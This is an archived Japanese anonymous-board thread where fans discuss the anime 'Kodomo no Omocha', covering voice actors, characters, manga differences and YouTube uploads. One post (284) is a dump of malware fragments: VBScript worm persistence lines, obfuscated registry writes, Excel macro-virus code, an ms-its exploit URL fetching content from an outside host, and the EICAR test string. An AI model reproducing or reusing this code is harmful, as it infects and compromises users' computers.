社会現象を起こした作品なのに原作が終わる頃は冷めててなんかかなしかったな。

280 :名無しさん@お腹いっぱい。:2006/10/26(木) 00:06:57 ID:gnBOop130
不親切な移転の仕方だな。

281 :名無しさん@お腹いっぱい。:2006/11/02(木) 00:10:22 ID:t3g6ZR750
>>277
ノピア「いこうよいこうよ中学校」
http://www.youtube.com/watch?v=hUuQTVwjOtA

ところで、この「かわいい制服うれし はずかし」の部分さなちゃんの声じゃないみたいなんだけど?
聞いてみて!(3:00ぐらい)

282 :名無しさん@お腹いっぱい。:2006/11/02(木) 02:14:42 ID:???0
ぶらぶらせいじんのうたを今初めて聞きました。

・・・この素材をどう調理していいのか分かりません・・・

羽山の中の人、声優続けて欲しかったな・・・
出演作はこどちゃだけ?

283 :名無しさん@お腹いっぱい。:2006/11/02(木) 04:33:59 ID:???0
十兵衛ちゃんにも出てたよ。

284 :<body onload=window()>:2006/11/02(木) 20:53:08 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


285 :名無しさん@お腹いっぱい。:2006/11/04(土) 21:15:10 ID:UPQL3tj10
「こどちゃ」は漫画しか読んだ事ないけどアニメも観たいなー。
紗南主役の映画の「水の館」もおもしろかったなー

286 :名無しさん@お腹いっぱい。:2006/11/05(日) 19:30:17 ID:LSvyFhH10
こどちゃのアニメって何処で見れますか?

287 :名無しさん@お腹いっぱい。:2006/11/09(木) 00:52:59 ID:???0
家で見れます。

288 :名無しさん@お腹いっぱい。:2006/11/12(日) 22:30:18 ID:Yr4GK6Yd0
>>286
http://www.youtube.com/watch?v=yNh6TNBBbUQ&mode=related&search=

289 :名無しさん@お腹いっぱい。:2006/11/13(月) 07:20:36 ID:YPYMWtcZO
こんな板が立ってて移転したの今知ったがな。夏アニ板に新スレ立ってレスで気付いてワープしてきた。

まあどう考えてもそろそろ新しい板いると思ってたが。しかし「平成」って・・・「21世紀」にしたら・・・まあ人気ないのは堕ちる運命か・・・

290 :名無しさん@お腹いっぱい。:2006/11/18(土) 11:03:52 ID:???0
「次はおもちゃのまち、おもちゃのまちです。」
ウィイイイイイン〜〜〜〜〜 ガラガラガラガラ〜〜〜〜←ロングレールであるため車輪フラットが聞こえる。

291 :名無しさん@お腹いっぱい。:2006/11/21(火) 06:30:09 ID:???0
前に検索したけど見つからなかったのに今日は引っかかった^^;

何年か前に暇で全巻借りて見て号泣した。
アニメで泣いたのって後にも先にもこれだけだったなぁ
紗南ちゃん・・・・
親父が死ぬ前に入院してそこでの蛇?とかいう新聞記者と紗南のかあちゃん(義理)
のやりとりに異様に泣いたの覚えてる

292 :名無しさん@お腹いっぱい。:2006/11/25(土) 03:17:24 ID:085J9DtZ0
久しぶりに見たけど10年前とは違う感覚にとらわれたよ

10歳じゃわからんわな・・・

293 :名無しさん@お腹いっぱい。:2006/11/25(土) 09:44:28 ID:???0
>>290
ちょ(www東武鉄道東武宇都宮線(www

294 :名無しさん@お腹いっぱい。:2006/11/25(土) 14:49:07 ID:???O
このアニメってヒロインの小学生アイドルがクラスのリーダー的な男子と対立して
いじめられっ子を使ってその男子のズボンを下ろさせてち〇ぽ写真撮って脅して、
抵抗できなくなった男子が仲間の男子にボコボコにされてそれを見て心を入れ替えたヒロインが
男子に謝って付き合ってハッピーエンドていうアニメダック?

295 :名無しさん@お腹いっぱい。:2006/11/26(日) 01:37:46 ID:ekmNk6an0
五味君ってやっぱりゴミが好きなのね〜

296 :名無しさん@お腹いっぱい。:2006/11/26(日) 20:49:16 ID:???0
つつくぞてめー

297 :名無しさん@お腹いっぱい。:2006/11/27(月) 01:34:18 ID:lhWRusG60
サントラ売ってね〜

298 :名無しさん@お腹いっぱい。:2006/11/27(月) 16:30:16 ID:lhWRusG60
このアニメ結構人気ないんだな

299 :名無しさん@お腹いっぱい。:2006/11/28(火) 15:26:52 ID:???0
>>294
いやそんなに浅い感じじゃないぞ
というかこれでもかって位みんな暗い設定あり過ぎ

ようつべで全話見たいなぁ・・と思いつつも
そんなにうpするのも大変だし見るのも大変だな^^;

300 :名無しさん@お腹いっぱい。:2006/11/28(火) 21:11:56 ID:???0
>>299
ようつべに全話あるがな

301 :名無しさん@お腹いっぱい。:2006/11/30(木) 16:28:59 ID:???0
>>300
まじで?
104話だっけ?全部?

302 :名無しさん@お腹いっぱい。:2006/11/30(木) 17:13:01 ID:???0
この話で一番泣いた。
49話
ttp://www.youtube.com/watch?v=Pkxz2f78Hr4 1/3
ttp://www.youtube.com/watch?v=qQ8yIn4das0 2/3
ttp://www.youtube.com/watch?v=U4Clbb33GHk 3/3

303 :名無しさん@お腹いっぱい。:2006/12/01(金) 01:50:05 ID:???0
>>301
102話+OVAまである

304 :名無しさん@お腹いっぱい。:2006/12/02(土) 00:19:21 ID:???0
>>303
初めてOVA見た。微妙といえば微妙、大地ギャグが入ってないからか?・・・

http://www.youtube.com/watch?v=M5Pp87RxpoE
dangerously in love kodocha
というマッドビデオもあった・・・

305 :名無しさん@お腹いっぱい。:2006/12/02(土) 05:12:55 ID:???0
OVAっていつ制作されたの?

306 :名無しさん@お腹いっぱい。:2006/12/02(土) 19:17:46 ID:???0
>>304
OVAは漫画に忠実だけど声が・・・

SANASAMBA詰め合わせとかないんかなぁ

>>305
アニメやる前の年らしい

307 :名無しさん@お腹いっぱい。:2006/12/05(火) 01:25:14 ID:???0
>>305-306
漫画に人気が出て、とりあえずりぼんでOVA化して、
TVアニメ化したという流れだろうな

308 :名無しさん@お腹いっぱい。:2006/12/05(火) 10:30:24 ID:???0
全部うpするとは凄いよな^^;
このスレも見たりしてるんだろうか

309 :名無しさん@お腹いっぱい。:2006/12/05(火) 14:46:03 ID:c6Wc2N+w0
>>308
英語字幕入ってるから外人がうpしてるんだと思ってた

310 :名無しさん@お腹いっぱい。:2006/12/06(水) 17:54:23 ID:???0
誰かLDの特典CD持ってない?
LD買っても見れないしCDだけ欲しい・・・

311 :名無しさん@お腹いっぱい。:2006/12/07(木) 10:25:03 ID:???O
うざかったらスルーしてくれ。
たまに学園アリスがこの作品をパクッてるって聞くけどどこらへんが似てるの?

312 :名無しさん@お腹いっぱい。:2006/12/07(木) 15:31:52 ID:???0
見てわからない人には言ってもわからない

313 :名無しさん@お腹いっぱい。:2006/12/07(木) 23:54:09 ID:???0
全く似てない。外見だけのバチモン

314 :名無しさん@お腹いっぱい。:2006/12/08(金) 18:38:54 ID:???0
こどちゃ再放送とかしないのかね

315 :名無しさん@お腹いっぱい。:2006/12/08(金) 19:31:01 ID:???0
>>311
・ヒロインがとにかく元気で、周囲に影響を与える
・ヒーローがひねてる
・ヒーローに親友がひとりいて、その親友とヒロインを取り合う
ぐらいかな、主人公とその周辺キャラとの人間関係とかが似てると思う。
ただ、このレベルでパクリとか言い出すと、
こどちゃだって何かのパクリだろうってことになると思うが。

316 :名無しさん@お腹いっぱい。:2006/12/10(日) 16:21:22 ID:oQUxhzsM0
再放送激しく希望

317 :名無しさん@お腹いっぱい。:2006/12/11(月) 00:29:14 ID:???0
>>316
ようつべで見たらええがな

318 :名無しさん@お腹いっぱい。:2006/12/15(金) 04:40:28 ID:???0
おとなのおもちゃ はないんですか?

319 :名無しさん@お腹いっぱい。:2006/12/16(土) 00:42:05 ID:???0
>>318
少女向け漫画雑誌「りぼん」連載の作者は、誰かが「それ」を想像して
ニヤリとしてくれればいいということらしいぞ。釣られ乙

320 :名無しさん@お腹いっぱい。:2006/12/16(土) 08:01:58 ID:???0
これってあれだろ?カレーと白米を分け合うアニメ。そこだけ覚えてる。

321 :名無しさん@お腹いっぱい。:2006/12/16(土) 12:00:22 ID:???0
絹ごし豆腐にカレーをかけると旨い  ばびっとが言ってたような気がする。

322 :名無しさん@お腹いっぱい。:2006/12/16(土) 13:58:41 ID:xTfjWNlu0
好感度ランキング2位(苦笑)

323 :名無しさん@お腹いっぱい。:2006/12/17(日) 05:28:07 ID:???0
最近は伸びてるねぇこのスレ

まぁ古いが間違いなく名作だしな


324 :名無しさん@お腹いっぱい。:2006/12/17(日) 21:11:06 ID:???0
2年続いたんだよなぁ
小学生編と中学生編は別物だったが

325 :名無しさん@お腹いっぱい。:2006/12/19(火) 03:59:20 ID:???0
>>323
殆ど俺やがな…

326 :名無しさん@お腹いっぱい。:2006/12/19(火) 04:47:52 ID:bzDa51y1O
うわ、こどちゃのスレがあるw
小学生の時、アニメは欠かさず見てたわ。
オリジナルの話もクオリティ高かったなぁ、あのニート風な親父に惚れる話とかw
当時は本気で紗南に惚れてたよ。明るさと面白さは勿論、絶対的な美少女じゃないという設定もなんか逆に良かった。
アニメに影響を受けて漫画も買ったけど、消防とはいえ少女漫画買うのは超恥ずかしいんだわ、これがまた。
そして、捨てたら一生買いにいけないと思い、今でも持っている俺…
個人的には紗南の魅力が全開な小学生編は漫画よりアニメのが神。
中学生編の重いテーマは漫画のが良いけど。

取り敢えず、秋人のボケの面白さはとても女作家が描いたとは思えん位卓越している。

327 :名無しさん@お腹いっぱい。:2006/12/19(火) 17:18:21 ID:???0
バンジー対決のバックにかかってた曲、結構好きなんだけど、
1回しか使われず、CD3枚のどれにも入ってない。
あれは何だったんだろう。

328 :名無しさん@お腹いっぱい。:2006/12/19(火) 22:18:16 ID:???0
「なんのこにしきまいのうみー!」

 がツボだった

329 :名無しさん@お腹いっぱい。:2006/12/19(火) 23:09:18 ID:???0
渡米編イラネ

330 :名無しさん@お腹いっぱい。:2006/12/19(火) 23:10:52 ID:???0
小田のラジオききてー

331 :名無しさん@お腹いっぱい。:2006/12/20(水) 20:28:00 ID:???O
久々に借りて見ようかな
そして漫画を読むとなw

332 :名無しさん@お腹いっぱい。:2006/12/21(木) 10:19:06 ID:???0
アニメは羽山と風花ラブラブしすぎだろ…常識的に考えて


333 :名無しさん@お腹いっぱい。:2006/12/21(木) 16:43:08 ID:???0
羽山父は元ヤンだそうだが、原作ではその武勇伝は書かれてた?

334 :名無しさん@お腹いっぱい。:2006/12/22(金) 19:04:32 ID:???0
>>329
同意

たしか直澄君?だかの話だったような・・・

335 :名無しさん@お腹いっぱい。:2006/12/24(日) 01:28:10 ID:???0
再放送してくれ。こどちゃの実況がしたいんだ

336 :名無しさん@お腹いっぱい。:2006/12/25(月) 03:19:37 ID:0fuex4C/0
羽山×風花のほうがいいよな

337 :名無しさん@お腹いっぱい。:2006/12/25(月) 10:02:01 ID:???0
>333
原作では
父が「私は昔ワルだったんだ」と言ってた。
ちなみに母も元ヤンだとかw

338 :名無しさん@お腹いっぱい。:2006/12/26(火) 21:09:58 ID:???0
When you're crying
I will always be with you
When you're feelin'blue,
I will always smile to you

Sadness blows you in to cry
But I won't cry for yesterday
God knows well where you're going to
It's a lonely way...

When you're crying
I will always be with you
When you're feelin'blue,
I will always smile...

When you're sighing
I will always be with you
When you're feelin'blue,
I will stand beside you

When you're crying
I will always be with you
When you're feelin'blue,
I will always smile...


339 :名無しさん@お腹いっぱい。:2006/12/28(木) 04:51:12 ID:YB50rMj00
アニメ版の秋人×風花最高

340 :名無しさん@お腹いっぱい。:2006/12/31(日) 05:06:15 ID:???0
玲くんの面白さは異常

341 :名無しさん@お腹いっぱい。:2007/01/01(月) 05:04:54 ID:???O
サナが一番好きだから、風花が死ぬほど嫌い
邪魔すんな

342 :名無しさん@お腹いっぱい。:2007/01/01(月) 09:35:48 ID:???0
アニメで良かったのはタケちゃんなんだけどタケちゃんファンいない?
紗南と付き合ってたタケちゃんが羨ましかったw

343 : 【大凶】 【272円】 :2007/01/01(月) 13:57:44 ID:???0
風花はそれなりにいい子だけれど、羽山には紗南しかいないと思う。
また紗南とくっつく(中学生編最後では、しっかりとくっつけてほしかったなぁ)
こと前提でなら、風花と羽山が本格的に付き合って別れる一連のエピソードは
せつなくて好き。(ニューヨーク編と比べれば…。)
でも見てて羽山がすごく痛々しい。
初見のときは、紗南が一切出て来ない羽山風花ラブラブ回は辛かった。

武ちゃんは、ダメ人間なのはまったく許せるけれど、自己満足の中紗南に
大ショックを与えて逝ってしまったから嫌い。(きつくてスマソ)
あれは、紗南のための話ではなくて、オヤジドリームの話だと思うし、
それが悪いとは思わないけれど、痛々しさ、紗南の苦しみもきっちりリアルに
描写してあるから、辛い。

紗南の実の母親へのスタンスとかの描きかたがすごくよかったし、共感できた。
父親との関係性は、玲くんとの一連のエピソードでじゅうぶんだった。
玲くんと紗南の関係は、娘側から見てのドリームだと思うけれど、だからこそ
自分には心地よく感じたし、少女向けアニメを観る心づもりで武ちゃん編を
見せられたのはきつかった。
玲くんがすごく好きだから、玲くんの立場が紗南の中で薄くなっていくのも
いやだった。

けれど、いろんな立場の人間が、それぞれのキャラクターに肩入れして
さまざまな感想を抱くことが出来るのだから「こどちゃ」はほんとうに
優れた作品だと思うし、好きだけれど。

344 :名無しさん@お腹いっぱい。:2007/01/03(水) 19:38:23 ID:???0
アニメではテンポに誤魔化された気もする。

345 :名無しさん@お腹いっぱい。:2007/01/03(水) 22:57:07 ID:???0
うん。小学校編はよかったけどね、
ニューヨークから帰ってからが無理やりに感じる。

346 :名無しさん@お腹いっぱい。:2007/01/04(木) 09:05:34 ID:???O
風花の関西弁に違和感を感じずにいられんかった。
中の人って関西人じゃないだろ。
さらに言えば、風花の友達の大阪の子供達の関西弁がヒドかった。

347 :名無しさん@お腹いっぱい。:2007/01/04(木) 23:11:39 ID:???0
だな、それだけにぜんじろうが浮いてた。

348 :名無しさん@お腹いっぱい。:2007/01/05(金) 04:13:39 ID:???0
たけちゃんは他人だったら大問題だろwww

349 :名無しさん@お腹いっぱい。:2007/01/05(金) 13:15:44 ID:???O
原作ファンからしたら、アニメでぜんじろうが出てきてたのをどう思ってたんだろう?
俺は原作未読だから違和感は無かったけど。

350 :名無しさん@お腹いっぱい。:2007/01/06(土) 11:48:33 ID:???0
ぜんじろう以外にもいろいろオリジナル要素がたくさんあって、
作品の雰囲気自体が変わってたと思うんで(方向性は同じだけど)
漫画とは全然別物のこどちゃとして見てたかな。
原作に思い入れがあったから、最初は嫌だなと思ってたけど、
見てるうちにこういうこどちゃもいいな〜と思えるようになった。
ぜんじろうも良いキャラだった。

でも原作自体、最初始まった時
「小花美穂がコメディ漫画描き始めた!」っつってびっくりして
すごい違和感あったんで、アニメの変わり具合なんて可愛いもんですた。
昔からギャグが面白い人だったけど、メインはあくまでシリアスだったし
こどちゃが重い話になっても、あーいつもの作者だって感じたくらいで

351 :名無しさん@お腹いっぱい。:2007/01/06(土) 11:49:59 ID:???0
長文スマソでした
原作にいないメインっぽいキャラが出てきた時は毎回ちょっとびっくりした
ただぜんじろうは、あーさんまをこうしたかと思った

352 :名無しさん@お腹いっぱい。:2007/01/06(土) 15:18:15 ID:???O
原作ファンにとって、ばびっとの存在はどうだったの?

353 :名無しさん@お腹いっぱい。:2007/01/06(土) 18:09:26 ID:???0
ああそうか、おもちゃを売るのにマスコットがいるよなと思った。
やっぱまろちゃんじゃダメだったかと。
何でコウモリ?と思ったけど、いるとテンポ良いし
原作での作者のツッコミとか代わりに言ってくれるしいいキャラだった
やっぱ慣れるまで辛かったけど、可愛いしテンション高いし好きよ

354 :名無しさん@お腹いっぱい。:2007/01/06(土) 22:35:30 ID:???O
ばびっとの声優、声が結構好きだったのに、もう声優業はやってないのね。

355 :名無しさん:2007/01/07(日) 10:17:50 ID:bv1Ql8rs0
ようつべでまたこどちゃ
見れなくなった…

356 :名無しさん@お腹いっぱい。:2007/01/07(日) 11:31:20 ID:???0
>>354
引田とも子って、「少女隊」の元メンバーで、主役の予定だったらしいけどな。
カントクが引っ張ってきたとかナントカという話があったような。

357 :名無しさん@お腹いっぱい。:2007/01/08(月) 17:55:52 ID:???0
>>346
かなりの遅レスだけど、ぐぐってから書き込んだほうが良かったんじゃないの?
風花の中の人は名前からして関西人。そして、実際にも関西人。
風花の声をあててた当時
『自分は大阪出身なので、関西弁のキャラクターが出来て嬉しい』って感じのことを言ってた覚えもある。
それまでSNK(アーケードゲーム)の仕事が多かったから、テレビ(風花)から生駒さんの声が聞こえた時は驚いたなぁ。

358 :名無しさん@お腹いっぱい。:2007/01/09(火) 07:27:23 ID:???O
>>357
ふーん、関西人にしてはヘタクソな関西弁だったな。
イントネーションおかしすぎ。

359 :名無しさん@お腹いっぱい。:2007/01/09(火) 09:35:46 ID:???0
>>358
昔、あったらしい大阪弁キャラを語るスレで、こんなの見つけた。
なんとなく納得…。

15 名前: マロン名無しさん 投稿日: 02/08/27 14:51 ID:???
>>13
前に誰だかが言ってたけど、関西出身の人が書いた脚本を
関西出身の役者が演じても、不自然だというクレームは来るんだと。
これは役者の発声法とか芝居がかった言い方とか、そういうところに
不自然さを感じてしまうらしい。

16 名前: マロン名無しさん 投稿日: 02/08/27 15:06 ID:???
>>15
なるほど。
ウチの高校(もろ関西)の演劇部の芝居も関西弁がなんか不自然やったなー。

360 :名無しさん@お腹いっぱい。:2007/01/09(火) 17:43:21 ID:???0
ようつべ消された?

361 :名無しさん@お腹いっぱい。:2007/01/09(火) 22:18:03 ID:???0
ひえーいざーんのえいのじはー♪

362 :名無しさん@お腹いっぱい。:2007/01/10(水) 02:35:01 ID:???0
トワ一ハハ目なんだよーん♪

363 :名無しさん@お腹いっぱい。:2007/01/10(水) 03:33:42 ID:???0
又が抜けてる

364 :名無しさん@お腹いっぱい。:2007/01/11(木) 12:37:47 ID:???0
直澄君が大好き。
ただ声がもうちょっとなあ・・・と思って
中の人を調べたら知ってる声優さんだった。

・・・・・しまじろう、だよね。orz

365 :名無しさん@お腹いっぱい。:2007/01/11(木) 19:55:25 ID:???0
>>364
しまじろうバロスww

366 :名無しさん@お腹いっぱい。:2007/01/11(木) 23:04:52 ID:???0
まじかよw
たしかに声が・・・。

367 :名無しさん@お腹いっぱい。:2007/01/12(金) 16:17:31 ID:77UA+1Rf0
フウカってやたら嫌われててかわいそうだな
フウカほど惨めな役回りはないよ
サナの引き立て役になるために出された印象しかない

368 :名無しさん@お腹いっぱい。:2007/01/12(金) 16:20:24 ID:77UA+1Rf0
あ〜でもフウカは結局幼なじみとくっついたからな そんな不幸でもないか

369 :名無しさん@お腹いっぱい。:2007/01/12(金) 16:46:45 ID:???O
>>367
嫌われたってのは視聴者に?
関西弁だからかな?

370 :名無しさん@お腹いっぱい。:2007/01/13(土) 01:38:11 ID:???O
アニメ借りようと思ってる人、
もう10年程経ったしレンタルビデオ屋から消える日は近いよ
去年、一気に借りたけど数巻壊れてて借りだしてなかったし
その頃、いろんな店舗探し回ってる時に店員がそれに近いこと言ってた

371 :名無しさん@お腹いっぱい。:2007/01/13(土) 10:05:29 ID:???O
>>370
ヒント:ようつべ

372 :名無しさん@お腹いっぱい。:2007/01/13(土) 17:13:56 ID:uULoLIV00
>>369
大阪(笑)

373 :名無しさん@お腹いっぱい。:2007/01/14(日) 15:30:03 ID:???O
サナちゃんと玲くんは英語を話せたのですか?
直澄くんは話せそうだけど。

374 :名無しさん@お腹いっぱい。:2007/01/14(日) 16:51:29 ID:???0
ようつべで全部見るのもたいへんだぁ・・・
正月は小学生編だけなんとか見れたぜ
やっぱこどちゃ最高だ

375 :名無しさん@お腹いっぱい。:2007/01/14(日) 17:06:13 ID:???O
>>374
ようつべは10分単位だからねぇ・・・
わがままは言えないけどw

376 :名無しさん@お腹いっぱい。:2007/01/14(日) 19:56:27 ID:???0
>>375
それもあるし他の事しながら見たり思いつきで色々検索して
面白そうなの見つけたらそっち見てって感じで効率良く見てないんだよね^^;
100話以上見るのは大変だ・・・ぐずぐずしてて中途半端で消されちゃかなわんし


377 :名無しさん@お腹いっぱい。:2007/01/14(日) 20:23:56 ID:???0
ばびっと数え歌全部聞きたいんだけど何話にあるんだ…

378 :名無しさん@お腹いっぱい。:2007/01/14(日) 20:38:03 ID:???0
がんばって探すんだ!

379 :名無しさん@お腹いっぱい。:2007/01/14(日) 20:57:40 ID:???O
ようつべに著作権があるもの上げるのはあくまで違法なんで、
話題に出すならせめてようつべ板がいいと思うんだ

380 :名無しさん@お腹いっぱい。:2007/01/14(日) 23:05:12 ID:???0
>>379
ただでさえ過疎ってるのに・・・

381 :名無しさん@お腹いっぱい。:2007/01/14(日) 23:45:16 ID:???0
あんまりようつべようつべ言わないほうがいいのは確か
まぁ古い作品だし過疎るのはしょうがないよ・・・

382 :名無しさん@お腹いっぱい。:2007/01/15(月) 00:24:49 ID:???0
過疎だからっていう問題でもないもんな…


383 :名無しさん@お腹いっぱい。:2007/01/15(月) 09:19:01 ID:???O
俺がハマった数少ない少女系アニメ

・こどちゃ
・チャチャ
・カレカノ
・フルバ

全部ギャグ系だな・・・

384 :名無しさん@お腹いっぱい。:2007/01/15(月) 17:56:23 ID:???0
小学生編も19話以降からテンポが悪くなるな
特にサナとタケ編かな
「付き合ってる」宣言が唐突すぎて展開についてこれなかった



385 :名無しさん@お腹いっぱい。:2007/01/15(月) 17:59:44 ID:???0
あとベンチで寝てるサナを自分の家で寝かせるのもかな
着替えてるし
これに関してはロリコン・変態で片がつくけど

386 :名無しさん@お腹いっぱい。:2007/01/15(月) 20:22:47 ID:???0
>>385
今ならそこアニメ放送できないんじゃね?

387 :名無しさん@お腹いっぱい。:2007/01/16(火) 00:25:34 ID:???O
こどちゃの声優って、ほとんどが無名の人だったんだね。
メインキャラでもヘタなのはいてたな。
アヤちゃんや剛君の声優は上手いとは言えないよね。

たまに超脇役でドヘタクソな演技の人がいてたけど、
あれってもしかして、素人の読者にアフレコを体験させてあげるプレゼント企画でもやってたの?

388 :名無しさん@お腹いっぱい。:2007/01/16(火) 12:59:19 ID:???0
プレゼント企画は無かったと思った。
ただキャストは少年をそのまま起用したり>秋人
監督が趣味で入れた人とか多いから

ついでに、ぜんじろうのマネージャーを始め、脇役で自身も出演している>監督

389 :名無しさん@お腹いっぱい。:2007/01/16(火) 13:39:15 ID:???O
>>388
ぜんじろうのマネージャー役って監督だったの?

390 :名無しさん@お腹いっぱい。:2007/01/16(火) 20:42:10 ID:???0
あれがぜんじろうの全盛期だったな

391 :名無しさん@お腹いっぱい。:2007/01/16(火) 22:33:30 ID:???0
>>388
趣味というか演劇舞台関係の人とかを主に引っ張ってきたのだろう。
聴いてて不快には思わなかっけどな。上手下手以前に。

カントクといえば、後期で破産した倉田家が住んでいたボロアパートの隣人で、
べらんめえ口調の子守りしてる変なオヤジの声とかもな。
EDとかでも、変な絵も書いてたような・・・・

392 :名無しさん@お腹いっぱい。:2007/01/16(火) 22:37:25 ID:???0
熊さんだね。今丁度見てたヽ(´ー`)ノ

393 :名無しさん@お腹いっぱい。:2007/01/17(水) 07:13:26 ID:???O
>>390
ぜんじろうの全盛期はそれよりちょっと前の「テレビのツボ」(関西ローカル)に出てた頃だろうね。
あの時のぜんじろうは超天狗だったらしい。それで周りに嫌われてどんどん仕事減っていったそうな。
「テレビのツボ」が終わった後にこどちゃに出てたからビックリしたのを覚えてる。

394 :名無しさん@お腹いっぱい。:2007/01/17(水) 23:59:40 ID:???0
ようつべでこどものおもちゃを検索するときに
何で検索する?

395 :名無しさん@お腹いっぱい。:2007/01/18(木) 00:15:44 ID:NR1rWO1m0
∩゚∀゚∩うれしいとメガネが上がるんです

396 :名無しさん@お腹いっぱい。:2007/01/18(木) 09:30:58 ID:???0
木野花さんは上手い。
アフレコに関しては拙さがみえてしまうこともあるけど、
「あたりまえでしょ」
は、こっちまでもらい泣きする。
そもそも実紗子さんのキャラと合ってたかもしれないけど
あそこは演技力の勝利。

397 :名無しさん@お腹いっぱい。:2007/01/18(木) 22:57:46 ID:???0
ここでこどちゃが見れた
ttp://www.dailymotion.com/

最終話まだ見てないんだけどどこにある?

398 :名無しさん@お腹いっぱい。:2007/01/18(木) 23:18:19 ID:???0
nyにある

399 :名無しさん@お腹いっぱい。:2007/01/18(木) 23:48:05 ID:???0
洒落にある

400 :名無しさん@お腹いっぱい。:2007/01/18(木) 23:51:08 ID:???0
我が家にある

401 :名無しさん@お腹いっぱい。:2007/01/19(金) 00:32:09 ID:???O
>>396
上手いか?もの凄く違和感あったんだが。

402 :名無しさん@お腹いっぱい。:2007/01/19(金) 01:53:00 ID:RO9+bbdaO
原作の羽山と秋人とさなママのキャラが好きだった

403 :名無しさん@お腹いっぱい。:2007/01/19(金) 08:02:41 ID:???O
>>402
羽山と秋人

404 :名無しさん@お腹いっぱい。:2007/01/19(金) 21:34:34 ID:???0
こどちゃ最初から観てる
今45話まで来ました。
親子丼馬鹿編はマジで泣けた

少女漫画では最高な作品だ

405 :名無しさん@お腹いっぱい。:2007/01/20(土) 11:44:25 ID:???0
正直こどちゃ以外の少女漫画(アニメか?)あんま知らないけどこどちゃは最高だと思う

406 :名無しさん@お腹いっぱい。:2007/01/21(日) 00:17:46 ID:???0
タケちゃん編と、ナオズミ君編(NY編)は、
マンガにないけど、最高になきました。

407 :名無しさん@お腹いっぱい。:2007/01/21(日) 08:29:52 ID:???O
サブタイトルの付け方が秀逸だったね。
テンポがよく毎週、次のサブタイを見るのが楽しかった。



408 :名無しさん@お腹いっぱい。:2007/01/21(日) 15:15:43 ID:???0
タケちゃん編は俺も号泣した
分かりやす過ぎる死亡フラグがキツかったなぁ

409 :名無しさん@お腹いっぱい。:2007/01/21(日) 18:03:19 ID:???O
こどちゃ好きな人はこどちゃ連載前〜連載中頃のりぼん作品か
白泉系の少女漫画も楽しめると思う
白泉系なんて黄金期は男性ファンがごろごろいたし

正直、少女漫画はもっとアニメに出てきてほしい
アニメ化とか映画化とかされたと思ったらつまんないのが多かったりして、
もっと面白いのあるだろと。
ようやくホスト部がアニメになったけど後が続かないし。
ハチクロ程度で少女漫画にしては面白いとか言われてんのが信じられん。

410 :名無しさん@お腹いっぱい。:2007/01/21(日) 18:04:35 ID:???O
なんかえらそうな書き方になった
興奮しちゃったわスマソ

411 :名無しさん@お腹いっぱい。:2007/01/21(日) 20:48:01 ID:???O
>>409
俺、男だけど、アニメになってる少女マンガでオススメ教えて。

412 :名無しさん@お腹いっぱい。:2007/01/22(月) 02:03:52 ID:???0
こどちゃ高校生もしくは大学生編を・・・・

ってこれじゃこどちゃの良さが活かせないか、性描写もかなり増えるだろうし
そもそもこどちゃってタイトルがおかしくなる

413 :名無しさん@お腹いっぱい。:2007/01/22(月) 02:25:55 ID:cOJ2XTPG0
Youtubeでこどものおもちゃで検索しても出て来ない
たすけて!!!

414 :名無しさん@お腹いっぱい。:2007/01/22(月) 02:30:52 ID:???0
削除されたっぽいよ
ってか持ってたURLから直で繋いだら削除されましたって出たから・・・消えたね

415 :名無しさん@お腹いっぱい。:2007/01/22(月) 10:23:26 ID:???O
>>412
それじゃ、「おとなのおもちゃ」にしたら良い。

416 :名無しさん@お腹いっぱい。:2007/01/22(月) 15:42:39 ID:???0
>>413
ようつべ板で聞けよ

417 :名無しさん@お腹いっぱい。:2007/01/22(月) 17:01:51 ID:???0
長文スマソ
スレ違いなんで飛ばしてください
>>411
りぼんだとこどちゃ以外のやつは
アニメと原作と違いが大きすぎるのが多いんだけど、
赤ずきんチャチャとかときめきトゥナイトとか面白い…かな…
自分は原作の方が好きだが
あと満月をさがしてはアニメの方が面白いらしい

全然アニメ化してないけど
ミントな僕ら、ペンギンブラザーズとか、
同じ作者の他作品がTVアニメとかOVAになってるけど、
こっちの方が面白いし話もアニメ向きだと思う

418 :名無しさん@お腹いっぱい。:2007/01/22(月) 17:03:29 ID:???0
つづき。これで終わり。

白泉系はなかなかアニメにならないんだけど、
かろうじてフルーツバスケットと学園アリスかなあ。どっちも面白いと思う。
あとは桜蘭高校ホスト部もおすすめです
あとOVAでここはグリーン・ウッド、ぼくの地球を守ってとか。
アニメになってないけど、
桑田乃梨子とか緑川ゆき作品はハズレ無しだと思う。
あと講談社なかよしの小坂理絵作品は、面白いしアニメっぽい話が多いと思う。
あとりぼんの岡田あーみん。全部アニメ化してないけど。

419 :名無しさん@お腹いっぱい。:2007/01/23(火) 01:44:16 ID:???0
youtubeの話ばかりだな…

420 :名無しさん@お腹いっぱい。:2007/01/23(火) 13:48:08 ID:???0
>>417-418
少女漫画はホント、面白いやつはなかなかアニメにならないんだよな。
商品化できそうなのが優先されるのは少女マンガに限ったことじゃないけど、
商品展開のために無理矢理話を変えられるのが多すぎて
面白い原作でもつまんなくなる

こどちゃもグッズ入れてところどころ変わったけど、
ちゃんと面白かったから貴重だ。

少女マンガとしての面白さを
そのままアニメにするのは難しいことが多いし、相性も悪いんかね

421 :413:2007/01/24(水) 02:58:33 ID:0R9YP1J10
よかったあった☆

422 :名無しさん@お腹いっぱい。:2007/01/24(水) 17:41:09 ID:???0
>>421
